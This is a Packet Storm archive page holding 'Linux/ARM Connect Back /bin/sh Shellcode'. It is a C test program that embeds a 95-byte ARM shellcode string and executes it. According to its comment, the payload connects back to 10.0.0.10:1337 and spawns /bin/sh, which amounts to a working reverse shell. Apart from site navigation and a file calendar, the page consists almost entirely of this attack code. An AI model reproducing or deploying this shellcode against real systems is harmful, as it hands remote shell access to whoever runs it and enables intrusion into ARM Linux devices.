exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/ARM Connect Back /bin/sh Shellcode

Linux/ARM Connect Back /bin/sh Shellcode
Posted Feb 29, 2016
Authored by Xeon

95 bytes small Linux/ARM connect back to ip:port with /bin/sh shellcode.

tags | shellcode
systems | linux
SHA-256 | 862488148cff154d3e46b87741bb714cd23a1ee3beb98ca891065e92e484b066

Linux/ARM Connect Back /bin/sh Shellcode

Change Mirror Download
/*
Title : Linux/ARM - Connect back to {ip:port} with /bin/sh
Length : 95 bytes
Date : 2014-06-03
Author : Xeon
Tested : ARM1176 rev6 (v6l)
*/

#include <stdio.h>
#include <string.h>

char *shellcode = "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x92\x1a\x90\x1a\x17\x27\x01\xdf"
"\x02\x20\x41\x1e\x82\x1e\x07\x02\xe7\x3f\x01\xdf\x05\x1c\x01\xac"
"\x02\x21\x21\x60\x02\x34\x05\x21\x21\x70\x01\x34\x39\x21\x21\x70"
"\x0a\x21\x02\x91\x04\x34\x21\x70\x01\xa9\x10\x22\x02\x37\x01\xdf"
"\xdc\x3f\x02\x21\x28\x1c\x01\xdf\x01\x39\xfb\xd5\x49\x1a\x92\x1a"
"\x0b\x27\x01\xa0\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x73\x68"; /* 10.0.0.10:1337 */

int main()
{
__asm__ ( "eor r0, r0\n\t"
"sub r0, #1\n\t"
"mov r1, r0\n\t"
"mov r2, r0\n\t"
"mov r3, r0\n\t"
"mov r4, r0\n\t"
"mov r5, r0\n\t"
"mov r6, r0\n\t"
"mov r7, r0\n\t");

printf("Shellcode length: %d\n", strlen(shellcode));
printf("Running shellcode...\n");
(*(void(*)()) shellcode)();
printf("Failed!\n");
return 0;
}

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close